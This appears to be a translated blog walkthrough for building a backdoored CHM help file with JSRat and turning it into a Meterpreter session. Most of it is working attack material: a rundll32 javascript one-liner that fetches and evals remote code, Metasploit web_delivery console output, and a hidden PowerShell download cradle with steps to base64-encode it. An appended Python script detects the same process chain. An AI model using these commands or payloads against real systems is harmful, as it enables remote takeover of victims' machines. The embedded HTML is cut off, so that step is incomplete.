Start the JSRat server in interactive mode:

```bash
python MyJSRat.py -i 192.168.1.101 -p 8080
```
Visiting http://192.168.1.101:8080/wtf returns the attack code, which is:

```bat
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.1.101:8080/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
```
After many tests, the command above was successfully embedded in a CHM with the following HTML code:

```html
<!DOCTYPE html>
```
After compiling the CHM and opening it, the JS interactive shell is obtained. Commands are run with:

```text
cmd /c command
```
Direct execution pops up a black console window; use `run` instead to avoid showing it. After `run`, enter `whoami > e:\1.txt`, then use `read` to retrieve the output.
2. Get Meterpreter session

This test obtains a Meterpreter session by executing a PowerShell command. It can be done directly, or the PowerShell command can be executed automatically once the client's JS interactive shell has been acquired. Here's how:
Start MSF web_delivery:

```console
~ msfconsole -Lq
msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set target 2
target => 2
msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(web_delivery) > set lhost 192.168.1.101
lhost => 192.168.1.101
msf exploit(web_delivery) > set lport 6666
lport => 6666
msf exploit(web_delivery) > set srvport 8081
srvport => 8081
msf exploit(web_delivery) > set uripath /
uripath => /
msf exploit(web_delivery) > exploit
[*] Exploit running as background job.
msf exploit(web_delivery) >
[*] Started reverse TCP handler on 192.168.1.101:6666
[*] Using URL: http://0.0.0.0:8081/
[*] Local IP: http://192.168.1.101:8081/
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $n=new-object net.webclient;$n.proxy=[Net.WebRequest]::GetSystemWebProxy();$n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $n.downloadstring('http://192.168.1.101:8081/');
```
A client with PowerShell obtains a Meterpreter session by executing the following command:

```powershell
powershell.exe -nop -w hidden -c $n=new-object net.webclient;$n.proxy=[Net.WebRequest]::GetSystemWebProxy();$n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $n.downloadstring('http://192.168.1.101:8081/');
```
Because of the special characters, the code above is encoded as Base64. Save the following to power.txt:

```powershell
$n=new-object net.webclient;$n.proxy=[Net.WebRequest]::GetSystemWebProxy();$n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $n.downloadstring('http://192.168.1.101:8081/');
```
Execute the following command:

```bash
cat power.txt | iconv --to-code UTF-16LE | base64
```
The final PowerShell command to execute is:

```powershell
powershell -ep bypass -enc <BASE64_OMITTED>
```
To get a Meterpreter session directly, use the execute-command mode:

```bash
python MyJSRat.py -i 192.168.1.101 -p 8080 -c "powershell -ep bypass -enc <BASE64_OMITTED>"
```
During the test, from running the CHM to getting Meterpreter, nothing obviously abnormal is visible on the client: only a black console window pops up, and the Meterpreter session arrives as follows:
So far I have not found any defensive measure; friends who know of one are welcome to share. The best approach is to improve personal security awareness: be careful with such documents, do not open them casually, and if you are not sure, open them inside a virtual machine. Using Procexp.exe, you can see that a CHM file with a backdoor will open a new process.
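As an added defensive example (not from the original post or from JSRat), the following Python script turns the process-tree observation above into detection logic over constructed Sysmon-style process-creation events: it flags hh.exe spawning any child, rundll32.exe started with a javascript: URL or mshtml RunHTMLApplication, and PowerShell launched with an encoded command, hidden window or DownloadString, which are the patterns shown in this post. The field names and sample events are assumptions constructed for the example.

```python
import ntpath
import re

# Constructed Sysmon-style process-creation events (assumed field names,
# not real telemetry). Events 0 and 1 mirror the CHM -> rundll32 -> powershell
# chain described in the post; events 2 and 3 are benign-looking controls.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\hh.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();'},
    {"parent": r"C:\Windows\System32\rundll32.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -ep bypass -enc <BASE64_OMITTED>"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": "rundll32.exe shell32.dll,Control_RunDLL"},
    {"parent": r"C:\Windows\hh.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe readme.txt"},
]

def _exe(path):
    """Case-folded file name of a Windows path (ntpath works on any host OS)."""
    return ntpath.basename(path).lower()

# Each rule is (name, predicate); the names describe the behaviour from the post.
RULES = [
    # hh.exe (the CHM viewer) has little legitimate reason to spawn children.
    ("chm_spawns_child",
     lambda e: _exe(e["parent"]) == "hh.exe"),
    # rundll32 driven by a javascript: URL instead of a DLL export.
    ("rundll32_javascript_url",
     lambda e: _exe(e["image"]) == "rundll32.exe"
               and re.search(r"javascript:", e["cmdline"], re.I) is not None),
    # mshtml RunHTMLApplication used to run script from a command line.
    ("mshtml_runhtmlapplication",
     lambda e: "runhtmlapplication" in e["cmdline"].lower()),
    # PowerShell with an encoded command, hidden window or web downloader.
    ("powershell_encoded_hidden_download",
     lambda e: _exe(e["image"]) == "powershell.exe"
               and re.search(r"\s-(enc|encodedcommand|e)\b|-w\s+hidden|downloadstring",
                             e["cmdline"], re.I) is not None),
]

def evaluate(event):
    """Return the names of all rules the event matches, in rule order."""
    return [name for name, pred in RULES if pred(event)]

def triage(events):
    """Map event index -> matched rule names, keeping only events that hit."""
    return {i: hits for i, ev in enumerate(events) if (hits := evaluate(ev))}

if __name__ == "__main__":
    for idx, hits in triage(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(hits)}")
```

The same predicates map directly onto a Sysmon Event ID 1 query (ParentImage, Image, CommandLine) or Procexp's process tree, which is where the parent-child relationship the post mentions is visible.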
CHM + Jsbackdoor Bundled backdoor